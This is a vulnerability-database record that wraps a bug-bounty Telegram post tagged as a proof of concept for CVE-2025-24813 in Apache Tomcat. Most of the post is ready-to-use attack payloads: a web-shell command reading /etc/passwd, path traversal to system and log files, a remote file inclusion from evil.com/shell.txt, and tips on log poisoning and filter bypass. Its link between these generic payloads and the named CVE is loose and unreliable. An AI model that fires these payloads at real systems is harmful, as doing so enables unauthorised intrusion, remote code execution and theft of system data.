{"uuid": "51c9faf2-e2b9-477d-abb7-a6e539f013ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24813", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/138", "content": "\ud83d\udd0d LFI via GET Request - Local File Inclusion Exploit\n\nIf you find an endpoint vulnerable to LFI (Local File Inclusion), try this payload:\n\n/shell.jsp?cmd=cat+%2Fetc%2Fpasswd\n\n\u2705 Why this works?\ncat /etc/passwd reads system user details.\n%2F is URL encoding for / (to bypass filters).\nWorks on misconfigured web applications allowing direct command execution.\n\n\ud83d\udd25 More Payloads to Try:\n?file=../../../../../../etc/passwd\n?page=../../../../../../../var/log/apache2/access.log\n?inc=http://evil.com/shell.txt (RFI possibility!)\n?cmd=ls+-la+/var/www/html/\n\n\ud83d\udca1 Pro Tips:\nTest null bytes %00 and encoding tricks.\nTry log poisoning for RCE.\nIf 403 is encountered, bypass with ..%2f..%2f..%2f sequences.\n\n\ud83d\udea8 Vulnerable Software Alert:\nCVE-2025-24813 - Apache Tomcat RCE via LFI\n\n\ud83d\udd17 Reference\n\n\ud83d\udd14 Stay updated with more Bug Bounty tips at @cybersecplayground!\n\n#BugBounty #LFI #RCE #Security #Pentesting \ud83d\ude80", "creation_timestamp": "2025-03-17T08:35:46.000000Z"}